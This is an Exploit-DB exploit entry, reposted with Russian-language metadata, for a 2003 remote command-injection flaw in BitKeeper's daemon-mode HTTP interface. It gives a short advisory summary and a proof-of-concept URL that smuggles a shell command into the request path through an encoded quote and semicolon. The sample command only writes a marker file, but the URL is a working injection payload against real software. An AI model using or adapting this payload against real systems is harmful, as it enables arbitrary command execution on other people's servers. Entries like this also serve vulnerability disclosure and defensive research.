- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22145
- Проверка EDB
-
- Пройдено
- Автор
- MAURYCY PRODEUS
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2003-01-11
Код:
source: https://www.securityfocus.com/bid/6588/info
It has been reported that BitKeeper is vulnerable to an input validation bug. When the software is run in daemon mode, it starts a service with an interface that can be connected to via HTTP. By sending specially crafted input to the service, it is possible to execute abitrary commands.
http://www.example.com:port/diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c- Источник
- www.exploit-db.com
